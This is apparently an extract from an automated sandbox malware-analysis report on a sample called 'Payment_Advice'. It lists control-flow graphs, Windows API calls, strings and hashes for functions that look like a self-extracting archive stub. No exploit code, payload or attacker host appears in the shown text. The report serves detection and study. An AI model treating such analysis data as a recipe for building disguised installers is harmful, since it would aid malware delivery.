                                                                                                    control_flow_graph 753 51ce87-51ce8a 754 51ce90-51ceb5 GetTempPathW call 50b690 753->754 755 51d009-51d00c 753->755 763 51ceb9-51cee5 call 504092 call 50a231 754->763 757 51d012-51d018 755->757 758 51d3d9-51d404 call 51b314 755->758 760 51d024-51d02b 757->760 761 51d01a 757->761 766 51c793-51c7a1 758->766 767 51d40a-51d418 758->767 760->758 761->760 776 51ceb7-51ceb8 763->776 777 51cee7-51cefe SetDlgItemTextW 763->777 768 51c7a2-51c7b7 call 51af98 766->768 775 51c7b9 768->775 778 51c7bb-51c7d0 call 511fbb 775->778 776->763 777->758 779 51cf04-51cf0a 777->779 785 51c7d2-51c7d6 778->785 786 51c7dd-51c7e0 778->786 779->758 781 51cf10-51cf2b call 5222c6 779->781 787 51cf7b-51cf82 781->787 788 51cf2d-51cf39 781->788 785->778 789 51c7d8 785->789 786->758 790 51c7e6 786->790 792 51cfb4-51cfe4 call 51add2 call 51a7e4 787->792 793 51cf84-51cfaf call 510602 * 2 787->793 788->787 791 51cf3b 788->791 789->758 794 51c7ed-51c7f0 790->794 795 51ca7c-51ca7e 790->795 796 51ca5f-51ca61 790->796 797 51c9be-51c9c0 790->797 798 51cf3e-51cf42 791->798 792->758 832 51cfea-51d004 EndDialog 792->832 793->792 794->758 803 51c7f6-51c850 call 51a64d call 50bdf3 call 50a544 call 50a67e call 506edb 794->803 795->758 800 51ca84-51ca8b 795->800 796->758 799 51ca67-51ca77 SetWindowTextW 796->799 797->758 801 51c9c6-51c9d2 797->801 806 51cf44-51cf52 798->806 807 51cf56-51cf73 call 510602 798->807 799->758 800->758 808 51ca91-51caaa 800->808 809 51c9d4-51c9e5 call 527686 801->809 810 51c9e6-51c9eb 801->810 870 51c98f-51c9a4 call 50a5d1 803->870 806->798 814 51cf54 806->814 807->787 816 51cab2-51cac0 call 523e13 808->816 817 51caac 808->817 809->810 821 51c9f5-51ca00 call 51b48e 810->821 822 51c9ed-51c9f3 810->822 814->787 816->758 839 51cac6-51cacf 816->839 817->816 823 51ca05-51ca07 821->823 822->823 833 51ca12-51ca32 call 523e13 call 523e3e 823->833 834 51ca09-51ca10 call 523e13 823->834 832->758 859 51ca34-51ca3b 833->859 860 51ca4b-51ca4d 833->860 834->833 843 51cad1-51cad5 839->843 844 51caf8-51cafb 839->844 845 51cb01-51cb04 843->845 846 51cad7-51cadf 843->846 844->845 848 51cbe0-51cbee call 510602 844->848 853 51cb11-51cb2c 845->853 854 51cb06-51cb0b 845->854 846->758 851 51cae5-51caf3 call 510602 846->851 861 51cbf0-51cc04 call 52279b 848->861 851->861 871 51cb76-51cb7d 853->871 872 51cb2e-51cb68 853->872 854->848 854->853 866 51ca42-51ca4a call 527686 859->866 867 51ca3d-51ca3f 859->867 860->758 862 51ca53-51ca5a call 523e2e 860->862 881 51cc11-51cc6b call 510602 call 51b1be GetDlgItem SetWindowTextW SendMessageW call 523e49 861->881 882 51cc06-51cc0a 861->882 862->758 866->860 867->866 888 51c855-51c869 SetFileAttributesW 870->888 889 51c9aa-51c9b9 call 50a55a 870->889 875 51cbab-51cbce call 523e13 * 2 871->875 876 51cb7f-51cb97 call 523e13 871->876 905 51cb6a 872->905 906 51cb6c-51cb6e 872->906 875->861 910 51cbd0-51cbde call 5105da 875->910 876->875 892 51cb99-51cba6 call 5105da 876->892 881->758 921 51cc71-51cc85 SendMessageW 881->921 882->881 887 51cc0c-51cc0e 882->887 887->881 894 51c90f-51c91f GetFileAttributesW 888->894 895 51c86f-51c8a2 call 50b991 call 50b690 call 523e13 888->895 889->758 892->875 894->870 903 51c921-51c930 DeleteFileW 894->903 926 51c8b5-51c8c3 call 50bdb4 895->926 927 51c8a4-51c8b3 call 523e13 895->927 903->870 909 51c932-51c935 903->909 905->906 906->871 913 51c939-51c965 call 504092 GetFileAttributesW 909->913 910->861 922 51c937-51c938 913->922 923 51c967-51c97d MoveFileW 913->923 921->758 922->913 923->870 925 51c97f-51c989 MoveFileExW 923->925 925->870 926->889 932 51c8c9-51c909 call 523e13 call 51fff0 SHFileOperationW 926->932 927->926 927->932 932->894
                                                                                                    APIs
                                                                                                    • GetTempPathW.KERNEL32(00000800,?), ref: 0051CE9D
                                                                                                      • Part of subcall function 0050B690: _wcslen.LIBCMT ref: 0050B696
                                                                                                    • _swprintf.LIBCMT ref: 0051CED1
                                                                                                      • Part of subcall function 00504092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 005040A5
                                                                                                    • SetDlgItemTextW.USER32(?,00000066,0054946A), ref: 0051CEF1
                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0051CF22
                                                                                                    • EndDialog.USER32(?,00000001), ref: 0051CFFE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
                                                                                                    • String ID: %s%s%u
                                                                                                    • API String ID: 689974011-1360425832
                                                                                                    • Opcode ID: 0f04047112c41f766c135918c494d09fc64ce97e0af7aa700e4882295c4397d8
                                                                                                    • Instruction ID: cff72eb2ff152dd001d95a6cf97c88f4865eb3de4efb8862958672a9bcf15517
                                                                                                    • Opcode Fuzzy Hash: 0f04047112c41f766c135918c494d09fc64ce97e0af7aa700e4882295c4397d8
                                                                                                    • Instruction Fuzzy Hash: 3741B4B5840659AAEF219B50CC45EEE7BBCFB45304F4084A6F909E7081EE758A88DF71
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00523B72 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63COMMONLIBRARYCODE
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 937 523b72-523b7c 938 523bee-523bf1 937->938 939 523bf3 938->939 940 523b7e-523b8c 938->940 941 523bf5-523bf9 939->941 942 523b95-523bb1 LoadLibraryExW 940->942 943 523b8e-523b91 940->943 946 523bb3-523bbc GetLastError 942->946 947 523bfa-523c00 942->947 944 523b93 943->944 945 523c09-523c0b 943->945 949 523beb 944->949 945->941 950 523be6-523be9 946->950 951 523bbe-523bd3 call 526088 946->951 947->945 948 523c02-523c03 FreeLibrary 947->948 948->945 949->938 950->949 951->950 954 523bd5-523be4 LoadLibraryExW 951->954 954->947 954->950
                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00523C35,00000000,00000FA0,00562088,00000000,?,00523D60,00000004,InitializeCriticalSectionEx,00536394,InitializeCriticalSectionEx,00000000), ref: 00523C03
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary
                                                                                                    • String ID: api-ms-$c*R
                                                                                                    • API String ID: 3664257935-1332622827
                                                                                                    • Opcode ID: 6fc3f11a543943ef310ec3033c118ff4b1d4f366fa093a0b3730cded88139313
                                                                                                    • Instruction ID: 07e810df10423967dee90e66ab8729da6f397bb516fbae3cd897377b82965fa9
                                                                                                    • Opcode Fuzzy Hash: 6fc3f11a543943ef310ec3033c118ff4b1d4f366fa093a0b3730cded88139313
                                                                                                    • Instruction Fuzzy Hash: 58119136A45631ABCB228F68AC45B5A3FA4BF12770F250150F915FB2D0E768EE049AD1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0052A95B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 955 52a95b-52a974 956 52a976-52a986 call 52ef4c 955->956 957 52a98a-52a98f 955->957 956->957 964 52a988 956->964 959 52a991-52a999 957->959 960 52a99c-52a9c0 MultiByteToWideChar 957->960 959->960 962 52ab53-52ab66 call 51fbbc 960->962 963 52a9c6-52a9d2 960->963 965 52aa26 963->965 966 52a9d4-52a9e5 963->966 964->957 968 52aa28-52aa2a 965->968 969 52a9e7-52a9f6 call 532010 966->969 970 52aa04-52aa15 call 528e06 966->970 973 52aa30-52aa43 MultiByteToWideChar 968->973 974 52ab48 968->974 969->974 980 52a9fc-52aa02 969->980 970->974 981 52aa1b 970->981 973->974 977 52aa49-52aa5b call 52af6c 973->977 978 52ab4a-52ab51 call 52abc3 974->978 985 52aa60-52aa64 977->985 978->962 984 52aa21-52aa24 980->984 981->984 984->968 985->974 987 52aa6a-52aa71 985->987 988 52aa73-52aa78 987->988 989 52aaab-52aab7 987->989 988->978 992 52aa7e-52aa80 988->992 990 52ab03 989->990 991 52aab9-52aaca 989->991 995 52ab05-52ab07 990->995 993 52aae5-52aaf6 call 528e06 991->993 994 52aacc-52aadb call 532010 991->994 992->974 996 52aa86-52aaa0 call 52af6c 992->996 997 52ab41-52ab47 call 52abc3 993->997 1011 52aaf8 993->1011 994->997 1010 52aadd-52aae3 994->1010 995->997 998 52ab09-52ab22 call 52af6c 995->998 996->978 1008 52aaa6 996->1008 997->974 998->997 1012 52ab24-52ab2b 998->1012 1008->974 1013 52aafe-52ab01 1010->1013 1011->1013 1014 52ab67-52ab6d 1012->1014 1015 52ab2d-52ab2e 1012->1015 1013->995 1016 52ab2f-52ab3f WideCharToMultiByte 1014->1016 1015->1016 1016->997 1017 52ab6f-52ab76 call 52abc3 1016->1017 1017->978
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,005257FB,005257FB,?,?,?,0052ABAC,00000001,00000001,2DE85006), ref: 0052A9B5
                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0052ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0052AA3B
                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0052AB35
                                                                                                    • __freea.LIBCMT ref: 0052AB42
                                                                                                      • Part of subcall function 00528E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00524286,?,0000015D,?,?,?,?,00525762,000000FF,00000000,?,?), ref: 00528E38
                                                                                                    • __freea.LIBCMT ref: 0052AB4B
                                                                                                    • __freea.LIBCMT ref: 0052AB70
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1414292761-0
                                                                                                    • Opcode ID: 8ebef2b6da2afb80be081ea1e93d2be7d46774724e0b76b11dd2a65a4da9e27d
                                                                                                    • Instruction ID: dc171be6f59fe5b9fd2a20f020c3d28ccd37c9afe021be95d0674d4ffbdfff5d
                                                                                                    • Opcode Fuzzy Hash: 8ebef2b6da2afb80be081ea1e93d2be7d46774724e0b76b11dd2a65a4da9e27d
                                                                                                    • Instruction Fuzzy Hash: CD51D272600226AFDB258E64EC55EBBBFAAFF86710F154669FC04D61C0EB34DC40D691
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051ABAB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1020 51abab-51abca GetClassNameW 1021 51abf2-51abf4 1020->1021 1022 51abcc-51abe1 call 511fbb 1020->1022 1023 51abf6-51abf8 1021->1023 1024 51abff-51ac01 1021->1024 1027 51abf1 1022->1027 1028 51abe3-51abef FindWindowExW 1022->1028 1023->1024 1027->1021 1028->1027
                                                                                                    APIs
                                                                                                    • GetClassNameW.USER32(?,?,00000050), ref: 0051ABC2
                                                                                                    • SHAutoComplete.SHLWAPI(?,00000010), ref: 0051ABF9
                                                                                                      • Part of subcall function 00511FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0050C116,00000000,.exe,?,?,00000800,?,?,?,00518E3C), ref: 00511FD1
                                                                                                    • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0051ABE9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                    • String ID: @UJu$EDIT
                                                                                                    • API String ID: 4243998846-1013725496
                                                                                                    • Opcode ID: a3f1759e1fbc444e5adb83d8887333fb1f9b8e59e78cdad10ff3df5309d58d2e
                                                                                                    • Instruction ID: 2a5d18f57887080f8536b571c0d8861bcb3445520206006c2fbeff23260ef8f8
                                                                                                    • Opcode Fuzzy Hash: a3f1759e1fbc444e5adb83d8887333fb1f9b8e59e78cdad10ff3df5309d58d2e
                                                                                                    • Instruction Fuzzy Hash: 3DF0823260122976EB2156289C09FDB7AACAB46B50F484051FA05A31C0D7A4EA8AC5BA
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 005098E0 Relevance: 7.6, APIs: 5, Instructions: 111filetimeCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1029 5098e0-509901 call 51ec50 1032 509903-509906 1029->1032 1033 50990c 1029->1033 1032->1033 1034 509908-50990a 1032->1034 1035 50990e-50991f 1033->1035 1034->1035 1036 509921 1035->1036 1037 509927-509931 1035->1037 1036->1037 1038 509933 1037->1038 1039 509936-509943 call 506edb 1037->1039 1038->1039 1042 509945 1039->1042 1043 50994b-50996a CreateFileW 1039->1043 1042->1043 1044 5099bb-5099bf 1043->1044 1045 50996c-50998e GetLastError call 50bb03 1043->1045 1047 5099c3-5099c6 1044->1047 1049 5099c8-5099cd 1045->1049 1051 509990-5099b3 CreateFileW GetLastError 1045->1051 1047->1049 1050 5099d9-5099de 1047->1050 1049->1050 1052 5099cf 1049->1052 1053 5099e0-5099e3 1050->1053 1054 5099ff-509a10 1050->1054 1051->1047 1055 5099b5-5099b9 1051->1055 1052->1050 1053->1054 1056 5099e5-5099f9 SetFileTime 1053->1056 1057 509a12-509a2a call 510602 1054->1057 1058 509a2e-509a39 1054->1058 1055->1047 1056->1054 1057->1058
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00507760,?,00000005,?,00000011), ref: 0050995F
                                                                                                    • GetLastError.KERNEL32(?,?,00507760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0050996C
                                                                                                    • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00507760,?,00000005,?), ref: 005099A2
                                                                                                    • GetLastError.KERNEL32(?,?,00507760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 005099AA
                                                                                                    • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00507760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 005099F9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$CreateErrorLast$Time
                                                                                                    • String ID:
                                                                                                    • API String ID: 1999340476-0
                                                                                                    • Opcode ID: e382105cb8eec01cce321dfb928bc960f4142e051a2319169613a96743db2bfa
                                                                                                    • Instruction ID: 8d6866a80ed5c4ab6d05c6541c70d317b04661c9f75ab9b9e3b9b9061e6e6ace
                                                                                                    • Opcode Fuzzy Hash: e382105cb8eec01cce321dfb928bc960f4142e051a2319169613a96743db2bfa
                                                                                                    • Instruction Fuzzy Hash: 2D3122305447466FE7309F24CC4ABEEBF94BB44320F200F19F9A1962D6D3B4A988CB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051B568 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1088 51b568-51b581 PeekMessageW 1089 51b583-51b597 GetMessageW 1088->1089 1090 51b5bc-51b5be 1088->1090 1091 51b599-51b5a6 IsDialogMessageW 1089->1091 1092 51b5a8-51b5b6 TranslateMessage DispatchMessageW 1089->1092 1091->1090 1091->1092 1092->1090
                                                                                                    APIs
                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0051B579
                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0051B58A
                                                                                                    • IsDialogMessageW.USER32(00010440,?), ref: 0051B59E
                                                                                                    • TranslateMessage.USER32(?), ref: 0051B5AC
                                                                                                    • DispatchMessageW.USER32(?), ref: 0051B5B6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$DialogDispatchPeekTranslate
                                                                                                    • String ID:
                                                                                                    • API String ID: 1266772231-0
                                                                                                    • Opcode ID: 8de8069214067252b8cdad253a4f1fd7dd5ebb82826f08743f6482357a72e05f
                                                                                                    • Instruction ID: db7d67195ff628de133829eca25edac1348abb336fdca4bb9896c05f9f5931fb
                                                                                                    • Opcode Fuzzy Hash: 8de8069214067252b8cdad253a4f1fd7dd5ebb82826f08743f6482357a72e05f
                                                                                                    • Instruction Fuzzy Hash: 3FF0A975A0111AAADB209BA59C4CDDB7FBDEE162A57004415F505D3010EB74D64DDBB0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051AC16 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34comCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 0051081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00510836
                                                                                                      • Part of subcall function 0051081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0050F2D8,Crypt32.dll,00000000,0050F35C,?,?,0050F33E,?,?,?), ref: 00510858
                                                                                                    • OleInitialize.OLE32(00000000), ref: 0051AC2F
                                                                                                    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0051AC66
                                                                                                    • SHGetMalloc.SHELL32(00548438), ref: 0051AC70
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                                    • String ID: riched20.dll
                                                                                                    • API String ID: 3498096277-3360196438
                                                                                                    • Opcode ID: 98898e59c5351729ea00b7146d6ff983486b120a2725fb1a1ca7ec3998e311da
                                                                                                    • Instruction ID: e3457b6c18ed6ba91c5dda5f15ea53215c9e2722565884eaf74e1856aae950f8
                                                                                                    • Opcode Fuzzy Hash: 98898e59c5351729ea00b7146d6ff983486b120a2725fb1a1ca7ec3998e311da
                                                                                                    • Instruction Fuzzy Hash: B6F0F9B190020AABDB10AFA9D8499EFFFFCFF94714F00415AE815A2241DBB456499FA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051DBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1097 51dbde-51dc12 call 51ec50 SetEnvironmentVariableW call 510371 1102 51dc14-51dc18 1097->1102 1103 51dc36-51dc38 1097->1103 1104 51dc21-51dc28 call 51048d 1102->1104 1107 51dc1a-51dc20 1104->1107 1108 51dc2a-51dc30 SetEnvironmentVariableW 1104->1108 1107->1104 1108->1103
                                                                                                    APIs
                                                                                                    • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0051DBF4
                                                                                                    • SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0051DC30
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnvironmentVariable
                                                                                                    • String ID: sfxcmd$sfxpar
                                                                                                    • API String ID: 1431749950-3493335439
                                                                                                    • Opcode ID: 36fcd9d5ca6529c1f9450421e7d2923f9603aca158f2a551a28c92c674a50b35
                                                                                                    • Instruction ID: 299f574fcaddece70c6bde109a8bb66a7c7706b7ace53f993642fd19e762307e
                                                                                                    • Opcode Fuzzy Hash: 36fcd9d5ca6529c1f9450421e7d2923f9603aca158f2a551a28c92c674a50b35
                                                                                                    • Instruction Fuzzy Hash: 5AF0A7B2404225A6EB202B95CC0ABFA3F68BF14785B040811BD8596151E7F48DC0E6F0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00509785 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1109 509785-509791 1110 509793-50979b GetStdHandle 1109->1110 1111 50979e-5097b5 ReadFile 1109->1111 1110->1111 1112 509811 1111->1112 1113 5097b7-5097c0 call 5098bc 1111->1113 1114 509814-509817 1112->1114 1117 5097c2-5097ca 1113->1117 1118 5097d9-5097dd 1113->1118 1117->1118 1119 5097cc 1117->1119 1120 5097ee-5097f2 1118->1120 1121 5097df-5097e8 GetLastError 1118->1121 1122 5097cd-5097d7 call 509785 1119->1122 1124 5097f4-5097fc 1120->1124 1125 50980c-50980f 1120->1125 1121->1120 1123 5097ea-5097ec 1121->1123 1122->1114 1123->1114 1124->1125 1127 5097fe-509807 GetLastError 1124->1127 1125->1114 1127->1125 1129 509809-50980a 1127->1129 1129->1122
                                                                                                    APIs
                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00509795
                                                                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 005097AD
                                                                                                    • GetLastError.KERNEL32 ref: 005097DF
                                                                                                    • GetLastError.KERNEL32 ref: 005097FE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
